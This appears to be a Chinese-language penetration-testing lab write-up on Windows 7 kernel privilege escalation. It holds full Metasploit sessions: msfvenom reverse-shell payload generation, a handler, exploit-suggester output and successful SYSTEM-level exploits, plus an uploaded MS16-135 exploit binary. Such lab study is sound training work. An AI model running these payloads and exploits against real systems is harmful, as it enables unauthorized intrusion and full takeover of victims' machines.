Windows Kernel Exploits(Windows 内核漏洞利用)
权限提升
权限提升是利用系统中的漏洞或错误配置将权限从一个用户提升到另一个用户的过程,通常是在系统上具有管理或root访问权限的用户。
权限升级是攻击生命周期的重要元素,也是渗透测试整体成功的主要决定因素。
在目标系统上获得初步立足点后,您将需要提升您的权限以执行需要管理权限的任务和功能。
权限提升在渗透测试过程中的重要性不能被夸大或忽视。 发展你的特权提升技能将使你成为一名优秀的渗透测试员。
Windows内核
内核是一种计算机程序,它是操作系统的核心,可以完全控制系统上的所有资源和硬件。 它充当硬件和软件之间的转换层,并促进这两层之间的通信。
Windows NT 是与所有版本的 Microsoft Windows 一起预先打包的内核,并作为传统内核运行,但基于用户设计理念的一些例外情况。 它由两种主要的操作模式组成,这些模式决定了对系统资源和硬件的访问:
用户模式 - 在用户模式下运行的程序和服务对系统资源和功能的访问受限。
内核模式 - 内核模式可以不受限制地访问系统资源和功能,并增加了管理设备和系统内存的功能。
Windows 内核利用
Windows 上的内核利用通常会针对 Windows 内核中的漏洞来执行任意代码,以便运行特权系统命令或获取系统 shell。
此过程将根据目标 Windows 的版本和使用的内核漏洞而有所不同。
Windows 系统上的权限提升通常遵循以下方法:
识别内核漏洞
下载、编译和传输内核漏洞到目标系统。
工具与环境
Windows-Exploit-Suggester - 此工具将目标补丁级别与 Microsoft 漏洞数据库进行比较,以检测目标上潜在的缺失补丁。 如果存在可用于丢失公告的公共漏洞利用和 Metasploit 模块,它还会通知用户。
Github: https://github.com/AonCyberLabs/Windows-Exploit-Suggester
Windows-Kernel-Exploits - 按 CVE 排序的 Windows 内核漏洞利用集合。
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-135
注意:本视频中演示的技术是在 Windows 7 SP1 VM 上执行的。
Demo: Windows Kernel Exploits
1
2
3
4
5
6
7
8
9
msf6 > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 powershell windows Accountant @ WIN7-PC 10.10.10.10:4444 -> 10.10.10.7:49166 (10.10.10.7)
3 meterpreter x64/windows Win7-PC\Accountant @ WIN7-PC 10.10.10.10:4433 -> 10.10.10.7:49167 (10.10.10.7)
1
2
3
4
msf6 > sessions 3
meterpreter > getuid
meterpreter > getprivs
meterpreter > getsystem
1
2
3
4
5
msf6 > search suggester
msf6 > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options
msf6 post(multi/recon/local_exploit_suggester) > sessions
msf6 post(multi/recon/local_exploit_suggester) > run
Search for ms10_092_schelevator on Google:
Windows Escalate Task Scheduler XML Privilege Escalation
Windows 升级任务计划程序 XML 权限升级
该模块利用了 Stuxnet 利用的 Task Scheduler 2.0 XML 0day。在处理任务文件时,Windows 任务计划程序仅使用 CRC32 校验和来验证文件是否未被篡改。此外,在默认配置中,普通用户可以读取和写入他们创建的任务文件。通过修改任务文件并创建 CRC32 冲突,攻击者可以使用 SYSTEM 权限执行任意命令。注意:感谢 webDEViL 提供有关禁用/启用的信息。
Search for ms16_014_wmi_recv_notif on Google:
Windows WMI Receive Notification Exploit
Windows WMI 接收通知漏洞利用
该模块利用了 ntoskrnl 的 WMI 子系统中未初始化的堆栈变量。该模块已在易受攻击的 Windows 7 SP0 x64 和 Windows 7 SP1 x64 版本上进行了测试。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_014_wmi_recv_notif
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 3
msf6 post(multi/recon/local_exploit_suggester) > sessions
msf6 post(multi/recon/local_exploit_suggester) > set LPORT 4422
msf6 post(multi/recon/local_exploit_suggester) > exploit
meterpreter > getuid
meterpreter >
background session 4? [y/N]
msf6 post(multi/recon/local_exploit_suggester) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 powershell windows Accountant @ WIN7-PC 10.10.10.10:4444 -> 10.10.10.7:49166 (10.10.10.7)
3 meterpreter x64/windows Win7-PC\Accountant @ WIN7-PC 10.10.10.10:4433 -> 10.10.10.7:49167 (10.10.10.7)
4 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN7-PC 10.10.10.10:4422 -> 10.10.10.7:49183 (10.10.10.7)
Perform manual privilege escalation:
This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
msf6 post(multi/recon/local_exploit_suggester) > session 3
meterpreter > getuid
Server username: Win7-PC\Accountant
meterpreter > shell
C:\Temp>systeminfo
Host Name: WIN7-PC
OS Name: Microsoft Windows 7 Ultimate
OS Version: 6.1.7601 Service Pack 1 Build 7601
...
Hotfix(s): 2 Hotfix(s) Installed.
[01]: KB2534111
[02]: KB976902
C:\Temp > ^C
Terminate channel 12? [y/N]
meterpreter >
Copy these information.
Open up a new terminal, paste copied information:
1
2
3
4
5
6
7
cd Desktop
vim win7.txt
ls
cd Windows-Enum/Windows-Exploit-Suggester
ls
./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2021-12-26-mssb.xls --systeminfo ~/Desktop/win7.txt
The exploits listed at the very top once have higher chance of successfully been exploited.
Search for MS16-135 on Google:
Download 41015.exe, transfer this executable onto the target system, and execute it, then I should have elevated privileges.
Use the meterpreter access to upload the executetable onto the Temp direcotory within the Windows’s :
1
2
3
4
5
6
7
8
9
10
11
12
13
meterpreter > cd C:\\
meterpreter > ls
meterpreter > cd Temp\\
meterpreter > ls
meterpreter > upload ~/Downloads/41015.exe
meterpreter > shell
C:\Temp>dir
C:\Temp>.\41015.exe
C:\Temp>.\41015.exe 7
C:\Temp>whoami
nt authority\system
Home Lab
环境:Windows 7 SP1。
1
2
3
4
5
6
7
8
┌──(root㉿kali)-[~]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.248.148 LPORT=1234 -f exe -o payload64.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: payload64.exe
直接尝试对unpriv账户进行提权,失败。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
┌──(root㉿kali)-[~]
└─# msfconsole -q
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.248.148
LHOST => 192.168.248.148
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.248.148:1234
[*] Sending stage (200774 bytes) to 192.168.248.150
[*] Meterpreter session 1 opened (192.168.248.148:1234 -> 192.168.248.150:49221) at 2022-10-06 20:25:48 -0400
meterpreter > getuid
Server username: IEWIN7\unpriv
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: 691 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
[-] Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.248.150 - Collecting local exploits for x64/windows...
[*] 192.168.248.150 - 167 exploit checks are being tried...
[+] 192.168.248.150 - exploit/windows/local/cve_2019_1458_wizardopium: The target appears to be vulnerable.
[-] 192.168.248.150 - Post interrupted by the console user
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.248.150 - Collecting local exploits for x64/windows...
[*] 192.168.248.150 - 167 exploit checks are being tried...
[+] 192.168.248.150 - exploit/windows/local/cve_2019_1458_wizardopium: The target appears to be vulnerable.
[+] 192.168.248.150 - exploit/windows/local/cve_2020_1054_drawiconex_lpe: The target appears to be vulnerable.
[+] 192.168.248.150 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 192.168.248.150 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.248.150 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.248.150 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 192.168.248.150 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 192.168.248.150 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 192.168.248.150 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/cve_2019_1458_wizardopium Yes The target appears to be vulnerable.
2 exploit/windows/local/cve_2020_1054_drawiconex_lpe Yes The target appears to be vulnerable.
3 exploit/windows/local/ikeext_service Yes The target appears to be vulnerable.
4 exploit/windows/local/ms10_092_schelevator Yes The target appears to be vulnerable.
5 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
6 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
7 exploit/windows/local/ms16_014_wmi_recv_notif Yes The target appears to be vulnerable.
8 exploit/windows/local/tokenmagic Yes The target appears to be vulnerable.
9 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
10 exploit/windows/local/always_install_elevated No The target is not exploitable.
11 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable.
12 exploit/windows/local/bypassuac_dotnet_profiler No The target is not exploitable.
13 exploit/windows/local/bypassuac_eventvwr No The target is not exploitable.
14 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
15 exploit/windows/local/bypassuac_sdclt No The target is not exploitable.
16 exploit/windows/local/bypassuac_sluihijack No The target is not exploitable.
17 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
18 exploit/windows/local/capcom_sys_exec No The target is not exploitable.
19 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
20 exploit/windows/local/cve_2020_0796_smbghost No The target is not exploitable.
21 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable.
22 exploit/windows/local/cve_2020_1313_system_orchestrator No The target is not exploitable.
23 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable.
24 exploit/windows/local/cve_2020_17136 No Cannot reliably check exploitability. Couldn't retrieve the target's build number!
25 exploit/windows/local/cve_2021_21551_dbutil_memmove No The target is not exploitable.
26 exploit/windows/local/cve_2021_40449 No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
27 exploit/windows/local/cve_2022_21882_win32k No The target is not exploitable.
28 exploit/windows/local/cve_2022_21999_spoolfool_privesc No The target is not exploitable. Windows 7 is technically vulnerable, though it requires a reboot.
29 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
30 exploit/windows/local/lexmark_driver_privesc No The target is not exploitable. No Lexmark print drivers in the driver store
31 exploit/windows/local/ms15_078_atmfd_bof No Cannot reliably check exploitability.
32 exploit/windows/local/ms16_032_secondary_logon_handle_privesc No The target is not exploitable.
33 exploit/windows/local/ms16_075_reflection No The target is not exploitable.
34 exploit/windows/local/ms16_075_reflection_juicy No The target is not exploitable.
35 exploit/windows/local/ntapphelpcachecontrol No The target is not exploitable.
36 exploit/windows/local/nvidia_nvsvc No The target is not exploitable.
37 exploit/windows/local/panda_psevents No The target is not exploitable.
38 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
39 exploit/windows/local/srclient_dll_hijacking No The target is not exploitable. Target is not Windows Server 2012.
40 exploit/windows/local/virtual_box_opengl_escape No The target is not exploitable.
41 exploit/windows/local/webexec No The target is not exploitable.
[*] Post module execution completed
Microsoft Windows Uninitialized Variable Local Privilege Elevation
Microsoft Windows 未初始化的变量本地特权提升
该模块利用 CVE-2019-1458,这是一个 win32k 中的任意指针取消引用漏洞,该漏洞是由于未初始化的变量而发生的,该漏洞允许用户模式攻击者将有限数量的受控数据写入内核内存中攻击者控制的地址。通过利用此漏洞对内核内存执行受控写入,攻击者可以以 SYSTEM 用户身份执行任意代码。此模块已针对 Windows 7 x64 SP1 进行了测试。漏洞利用代码中的偏移量可能需要调整以适用于其他版本的 Windows。该漏洞只能针对目标触发一次,并且可以在会话终止时导致目标计算机重新启动。
利用exploit/windows/local/cve_2019_1458_wizardopium提权为NT AUTHORITY\SYSTEM。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
msf6 post(multi/recon/local_exploit_suggester) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows IEWIN7\unpriv @ IEWIN7 192.168.248.148:1234 -> 192.168.248.150:49173 (192.168.248.150)
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/cve_2019_1458_wizardopium
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2019_1458_wizardopium) > show options
Module options (exploit/windows/local/cve_2019_1458_wizardopium):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.248.148 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 x64
msf6 exploit(windows/local/cve_2019_1458_wizardopium) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/cve_2019_1458_wizardopium) > exploit
[*] Started reverse TCP handler on 192.168.248.148:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Triggering the exploit...
[*] Launching msiexec to host the DLL...
[+] Process 2696 launched.
[*] Reflectively injecting the DLL into 2696...
[*] Sending stage (200774 bytes) to 192.168.248.150
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened (192.168.248.148:4444 -> 192.168.248.150:49237) at 2022-10-06 22:24:08 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeCreateSymbolicLinkPrivilege
SeCreateTokenPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeLockMemoryPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRelabelPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTcbPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
meterpreter >
利用windows/local/cve_2020_1054_drawiconex_lpe,提权到NT AUTHORITY\SYSTEM。
Microsoft CVE-2020-1054: Win32k Elevation of Privilege Vulnerability
Microsoft CVE-2020-1054:Win32k 特权提升漏洞
当 Windows 内核模式驱动程序无法正确处理内存中的对象时,Windows 中存在特权提升漏洞。成功利用此漏洞的攻击者可以在内核模式下运行任意代码。然后攻击者可以安装程序;查看、更改或删除数据;或创建具有完全用户权限的新帐户。要利用此漏洞,攻击者首先必须登录系统。然后,攻击者可以运行特制的应用程序,该应用程序可以利用该漏洞并控制受影响的系统。此更新通过更正 Windows 内核模式驱动程序处理内存中对象的方式来解决此漏洞。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
msf6 exploit(windows/local/cve_2020_1054_drawiconex_lpe) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows IEWIN7\unpriv @ IEWIN7 192.168.248.148:1234 -> 192.168.248.150:49173 (192.168.248.150)
2 meterpreter x64/windows NT AUTHORITY\SYSTEM @ IEWIN7 192.168.248.148:4444 -> 192.168.248.150:49237 (192.168.248.150)
msf6 exploit(windows/local/cve_2020_1054_drawiconex_lpe) > show options
Module options (exploit/windows/local/cve_2020_1054_drawiconex_lpe):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.248.148 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 x64
msf6 exploit(windows/local/cve_2020_1054_drawiconex_lpe) > set LPORT 1111
LPORT => 1111
msf6 exploit(windows/local/cve_2020_1054_drawiconex_lpe) > exploit
[*] Started reverse TCP handler on 192.168.248.148:1111
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Executing exploit...
[*] Launching msiexec to host the DLL...
[+] Process 1068 launched.
[*] Reflectively injecting the DLL into 1068...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (200774 bytes) to 192.168.248.150
[*] Meterpreter session 4 opened (192.168.248.148:1111 -> 192.168.248.150:49243) at 2022-10-06 22:43:27 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
exploit/windows/local/ikeext_service没有利用成功。
IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) Missing DLL
IKE 和 AuthIP IPsec 密钥环模块服务 (IKEEXT) 缺少 DLL
该模块利用以 SYSTEM 运行的“IKE 和 AuthIP 密钥环模块”(IKEEXT) 服务加载的缺失 DLL,并在 Vista-Win8 的默认安装中自动启动。它需要不安全的 bin 路径来植入 DLL 有效负载。
exploit/windows/local/ms10_092_schelevator没有利用成功。
Windows Escalate Task Scheduler XML Privilege Escalation
Windows 升级任务计划程序 XML 权限升级
该模块利用了 Stuxnet 利用的 Task Scheduler 2.0 XML 0day。在处理任务文件时,Windows 任务计划程序仅使用 CRC32 校验和来验证文件是否未被篡改。此外,在默认配置中,普通用户可以读取和写入他们创建的任务文件。通过修改任务文件并创建 CRC32 冲突,攻击者可以使用 SYSTEM 权限执行任意命令。注意:感谢 webDEViL 提供有关禁用/启用的信息。
exploit/windows/local/ms14_058_track_popup_menu利用成功,获得meterpreter,但getuid任然是IEWIN7\unpriv,无法getsystem。
Windows TrackPopupMenu Win32k NULL Pointer Dereference
Windows TrackPopupMenu Win32k NULL 指针取消引用
该模块利用了win32k.sys中的一个NULL Pointer Dereference,该漏洞可以通过使用TrackPopupMenu来触发。在特殊情况下,可以在 xxxSendMessageTimeout 上滥用 NULL 指针解引用来实现任意代码执行。该模块已在 Windows XP SP3、Windows 2003 SP2、Windows 7 SP1 和 Windows 2008 32bits 上成功测试。也适用于 Windows 7 SP1 和 Windows 2008 R2 SP1 64 位。
exploit/windows/local/ms15_051_client_copy_image可以利用,但无法获得meterpreter session。
Windows ClientCopyImage Win32k Exploit
Windows ClientCopyImage Win32k 漏洞利用
该模块利用了 win32k.sys 内核模式驱动程序中不正确的对象处理。此模块已在易受攻击的 Windows 7 x64 和 x86 以及 Windows 2008 R2 SP1 x64 版本上进行了测试。
Windows WMI Receive Notification Exploit
Windows WMI 接收通知漏洞利用
该模块利用了 ntoskrnl 的 WMI 子系统中未初始化的堆栈变量。该模块已在易受攻击的 Windows 7 SP0 x64 和 Windows 7 SP1 x64 版本上进行了测试。
Windows Privilege Escalation via TokenMagic (UAC Bypass)
exploit/windows/local/tokenmagic看似获得了shell,实际无法执行命令。
通过 TokenMagic 提升 Windows 权限(UAC 绕过)
该模块利用 UAC 绕过 (TokenMagic) 来生成进程/进行 DLL 劫持攻击以获得系统级权限。Windows 7 到 Windows 10 1803 受到影响。
综上,在Windows 7 SP1中可以成功利用,并获得NT AUTHORITY\SYSTEM权限的exploit有:
| exploit | Name | URL |
|---|---|---|
| exploit/windows/local/cve_2019_1458_wizardopium | Microsoft Windows Uninitialized Variable Local Privilege Elevation | https://www.rapid7.com/db/modules/exploit/windows/local/cve_2019_1458_wizardopium/ |
| exploit/windows/local/cve_2020_1054_drawiconex_lpe | Microsoft CVE-2020-1054: Win32k Elevation of Privilege Vulnerability | https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-1054/ |
下面执行手动提权:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
meterpreter > getuid
Server username: IEWIN7\unpriv
meterpreter > shell
Process 3000 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Temp>systeminfo
systeminfo
Host Name: IEWIN7
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner:
Registered Organization: Microsoft
Product ID: 00392-972-8000024-85559
Original Install Date: 3/6/2018, 11:10:22 AM
System Boot Time: 10/7/2022, 5:18:33 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 165 Stepping 2 GenuineIntel ~2304 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 3,144 MB
Virtual Memory: Max Size: 8,189 MB
Virtual Memory: Available: 7,198 MB
Virtual Memory: In Use: 991 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\IEWIN7
Hotfix(s): 210 Hotfix(s) Installed.
[01]: KB2670838
[02]: KB2830477
[03]: KB2592687
[04]: KB971033
[05]: KB2479943
[06]: KB2491683
[07]: KB2506014
[08]: KB2506212
[09]: KB2506928
[10]: KB2509553
[11]: KB2532531
[12]: KB2533552
[13]: KB2534366
[14]: KB2545698
[15]: KB2547666
[16]: KB2552343
[17]: KB2560656
[18]: KB2562937
[19]: KB2563227
[20]: KB2564958
[21]: KB2574819
[22]: KB2579686
[23]: KB2585542
[24]: KB2598845
[25]: KB2603229
[26]: KB2604115
[27]: KB2620704
[28]: KB2621440
[29]: KB2631813
[30]: KB2640148
[31]: KB2653956
[32]: KB2654428
[33]: KB2656356
[34]: KB2660075
[35]: KB2667402
[36]: KB2685811
[37]: KB2685813
[38]: KB2685939
[39]: KB2690533
[40]: KB2698365
[41]: KB2705219
[42]: KB2706045
[43]: KB2719857
[44]: KB2726535
[45]: KB2727528
[46]: KB2729094
[47]: KB2729452
[48]: KB2732059
[49]: KB2732487
[50]: KB2736422
[51]: KB2742599
[52]: KB2750841
[53]: KB2758857
[54]: KB2761217
[55]: KB2763523
[56]: KB2770660
[57]: KB2773072
[58]: KB2786081
[59]: KB2789645
[60]: KB2791765
[61]: KB2799926
[62]: KB2800095
[63]: KB2807986
[64]: KB2808679
[65]: KB2813430
[66]: KB2834140
[67]: KB2836942
[68]: KB2836943
[69]: KB2840631
[70]: KB2843630
[71]: KB2847927
[72]: KB2852386
[73]: KB2853952
[74]: KB2857650
[75]: KB2861698
[76]: KB2862152
[77]: KB2862330
[78]: KB2862335
[79]: KB2864202
[80]: KB2868038
[81]: KB2871997
[82]: KB2884256
[83]: KB2888049
[84]: KB2891804
[85]: KB2892074
[86]: KB2893294
[87]: KB2893519
[88]: KB2894844
[89]: KB2900986
[90]: KB2908783
[91]: KB2911501
[92]: KB2912390
[93]: KB2918077
[94]: KB2919469
[95]: KB2923545
[96]: KB2931356
[97]: KB2937610
[98]: KB2943357
[99]: KB2952664
[100]: KB2966583
[101]: KB2968294
[102]: KB2970228
[103]: KB2972100
[104]: KB2972211
[105]: KB2973112
[106]: KB2973201
[107]: KB2973351
[108]: KB2977292
[109]: KB2978120
[110]: KB2978742
[111]: KB2984972
[112]: KB2984976
[113]: KB2985461
[114]: KB2991963
[115]: KB2992611
[116]: KB3003743
[117]: KB3004361
[118]: KB3004375
[119]: KB3004469
[120]: KB3006121
[121]: KB3006137
[122]: KB3010788
[123]: KB3011780
[124]: KB3013531
[125]: KB3019978
[126]: KB3020370
[127]: KB3020388
[128]: KB3021674
[129]: KB3021917
[130]: KB3022777
[131]: KB3023215
[132]: KB3030377
[133]: KB3031432
[134]: KB3035126
[135]: KB3035132
[136]: KB3037574
[137]: KB3042058
[138]: KB3045685
[139]: KB3046017
[140]: KB3046269
[141]: KB3046480
[142]: KB3054476
[143]: KB3055642
[144]: KB3059317
[145]: KB3060716
[146]: KB3067903
[147]: KB3068708
[148]: KB3071756
[149]: KB3072305
[150]: KB3074543
[151]: KB3075220
[152]: KB3075226
[153]: KB3076895
[154]: KB3078601
[155]: KB3078667
[156]: KB3080079
[157]: KB3080149
[158]: KB3084135
[159]: KB3086255
[160]: KB3092601
[161]: KB3092627
[162]: KB3093513
[163]: KB3097989
[164]: KB3101722
[165]: KB3102429
[166]: KB3107998
[167]: KB3108371
[168]: KB3108381
[169]: KB3108664
[170]: KB3109103
[171]: KB3109560
[172]: KB3110329
[173]: KB3115858
[174]: KB3122648
[175]: KB3124275
[176]: KB3126587
[177]: KB3127220
[178]: KB3133977
[179]: KB3137061
[180]: KB3138378
[181]: KB3138612
[182]: KB3138910
[183]: KB3139398
[184]: KB3139914
[185]: KB3140245
[186]: KB3147071
[187]: KB3150220
[188]: KB3150513
[189]: KB3155178
[190]: KB3156016
[191]: KB3156019
[192]: KB3159398
[193]: KB3161102
[194]: KB3161949
[195]: KB3161958
[196]: KB3170735
[197]: KB3172605
[198]: KB3177467
[199]: KB3179573
[200]: KB3181988
[201]: KB3184143
[202]: KB4019990
[203]: KB4040980
[204]: KB4474419
[205]: KB4490628
[206]: KB958488
[207]: KB976902
[208]: KB976932
[209]: KB982018
[210]: KB4054518
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection 2
DHCP Enabled: Yes
DHCP Server: 192.168.248.254
IP address(es)
[01]: 192.168.248.150
[02]: fe80::583e:5c71:fbf1:623c
将systeminfo的输出保存在名为win7.txt的文件中,这里是/root/Tmp/win7.txt。
1
2
3
4
5
6
7
8
9
10
11
12
13
┌──(root㉿kali)-[~/Windows/exploiting/Windows-Exploit-Suggester]
└─# ls
LICENSE.md README.md windows-exploit-suggester.py
┌──(root㉿kali)-[~/Windows/exploiting/Windows-Exploit-Suggester]
